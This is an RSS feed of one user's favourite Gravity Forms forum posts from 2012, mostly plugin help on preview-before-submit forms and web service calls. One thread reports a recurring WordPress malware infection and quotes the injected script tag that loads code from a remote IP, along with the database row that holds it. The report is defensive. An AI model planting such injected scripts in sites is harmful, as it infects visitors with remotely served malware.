mhmi Gravity Support Forums User Favorites: mhmi en-US Sun, 19 Apr 2026 20:34:27 +0000 http://bbpress.org/?v=1.0.1 q https://legacy.forums.gravityhelp.com/search.php https://legacy.forums.gravityhelp.com/topic/possible-exploit#post-91622 Thu, 15 Nov 2012 18:50:47 +0000 David Smith 91622@https://legacy.forums.gravityhelp.com/ <p>Hi ionata,</p> <p>It looks like whatever this is is adding a text widget to your sidebar. Is Gravity Forms the last item in the sidebar? If so, there is a good chance it is just coincidentally under the Gravity Form widget.</p> <p>Hopefully the logging will provide more information on what event is triggering the injection and we can dig into this more from there. </p> https://legacy.forums.gravityhelp.com/topic/display-results-then-submit#post-91597 Thu, 15 Nov 2012 16:57:07 +0000 Tom 91597@https://legacy.forums.gravityhelp.com/ <p>Yep. That works like a charm :) Just implemented it too! </p> https://legacy.forums.gravityhelp.com/topic/display-results-then-submit#post-91592 Thu, 15 Nov 2012 16:48:03 +0000 docholoday 91592@https://legacy.forums.gravityhelp.com/ <p>Thanks David, that looks like just the thing! </p> https://legacy.forums.gravityhelp.com/topic/possible-exploit#post-91430 Thu, 15 Nov 2012 08:19:24 +0000 Chris Hajer 91430@https://legacy.forums.gravityhelp.com/ <p>I'll bring this to the attention of the developers to see if they can spot anything in your report related to Gravity Forms. Thank you. </p> https://legacy.forums.gravityhelp.com/topic/possible-exploit#post-91301 Thu, 15 Nov 2012 01:40:53 +0000 ionata 91301@https://legacy.forums.gravityhelp.com/ <p>Hey guys.</p> <p>We've been using Gravity Forms for quite a while now without any issue, but recently one of our sites has been regularly suffering from malware infections.</p> <p>It injects an entry into the wp_options table and attaches the extra div containing the offsite script below the Gravity Form widgets like thus:</p> <pre><code>&lt;div class=&quot;textwidget&quot;&gt; &lt;script type=&quot;text/javascript&quot; src=&quot;http://61.19.251.27/web/cb.php&quot;&gt;&lt;/script&gt; &lt;/div&gt;</code></pre> <p>Which, in the DB can be seen as: </p> <p>'mysql&gt; select * from wp_options where option_value like "%http://61.19.251.27/web/cb.php%";<br /> +-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+<br /> | option_id | option_name | option_value | autoload |<br /> +-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+<br /> | 87 | widget_text | a:3:{i:3;a:3:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";b:0;}i:7;a:3:{s:5:"title";s:1:" ";s:4:"text";s:78:"&lt;script type="text/javascript" src="http://61.19.251.27/web/cb.php"&gt;&lt;/script&gt;";s:6:"filter";b:0;}s:12:"_multiwidget";i:1;} | yes |<br /> +-----------+-------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+----------+<br /> 1 row in set (0.00 sec)'</p> <p>It's not a lot of information but its all we have at this stage. As I mentioned, it's happened once before - it's no trouble removing the infection when it occurs, but preventing it in the first place is giving us trouble. </p> <p>I've bumped up the logging for this site so that if it happens again we might get a better lock on it. Also this is not an on-disk attack, that is to say that no files are modified. So the injection is done through wordpress itself. It may not be the Gravity Forms plugin that is the target of the exploit, but it does seem strangely close to it . </p> https://legacy.forums.gravityhelp.com/topic/display-results-then-submit#post-91239 Wed, 14 Nov 2012 22:40:21 +0000 David Peralty 91239@https://legacy.forums.gravityhelp.com/ <p>I think this tutorial should help give you what you want:<br /> <a href="http://gravitywiz.com/2012/08/04/better-pre-submission-confirmation/" rel="nofollow">http://gravitywiz.com/2012/08/04/better-pre-submission-confirmation/</a> </p> https://legacy.forums.gravityhelp.com/topic/display-results-then-submit#post-91135 Wed, 14 Nov 2012 13:32:45 +0000 docholoday 91135@https://legacy.forums.gravityhelp.com/ <p>Hi there,<br /> I've used Gravity form over and over again for the basic features (contact forms, etc) but now I've been asked for something a little more advanced. Our in-house graphics department would like a form that people can fill out to request new business cards (if they run out, or change departments, etc). Normally they fill out a paper form, the artist creates a preview of how their card will look, and emails it to them. </p> <p>Could I do something similar with Gravity forms?</p> <p>Capturing the data is simple enough, but is there a way to create a "preview" before the form is submitted? It wouldn't even have to be styled in any special way, even just a literal display of what they entered (not an image), some sort of "are you sure?" statement, THEN the actual submit button.</p> <p>Basically, just a way for them to confirm the data before submitting it?</p> <p>Is there any mechanism in GF to do something similar? Can anyone point me the right direction? </p> https://legacy.forums.gravityhelp.com/topic/pass-data-from-form-to-external-url-via-a-web-service-call#post-88489 Wed, 07 Nov 2012 16:27:21 +0000 daniebroz 88489@https://legacy.forums.gravityhelp.com/ <p>I figured out another way to approach this by using the product fielid instead. Thanks for your hellp! </p> https://legacy.forums.gravityhelp.com/topic/pass-data-from-form-to-external-url-via-a-web-service-call#post-88097 Tue, 06 Nov 2012 19:42:49 +0000 daniebroz 88097@https://legacy.forums.gravityhelp.com/ <p>I figured out the unique numbering by using this post<br /> <a href="http://www.gravityhelp.com/forums/topic/guid-entry-id#post-1491" rel="nofollow">http://www.gravityhelp.com/forums/topic/guid-entry-id#post-1491</a></p> <p>I am writing the code for the gform_after_submission<br /> I have a product field that uses radio button options, how can I pull the chosen options Price into my<br /> $body = array (<br /> 'Amount' =&gt; $entry{}</p> <p>It seems I need a if...else statement. Will this accomplish what I need? <a href="http://pastie.org/5337585" rel="nofollow">http://pastie.org/5337585</a> </p> https://legacy.forums.gravityhelp.com/topic/pass-data-from-form-to-external-url-via-a-web-service-call#post-88043 Tue, 06 Nov 2012 16:41:18 +0000 daniebroz 88043@https://legacy.forums.gravityhelp.com/ <p>It is working now, thanks.</p> <p>How would I add the entry ID to this code to send as a unique invoice number. After reading some post on creating unique number is seems that would be easiest. </p>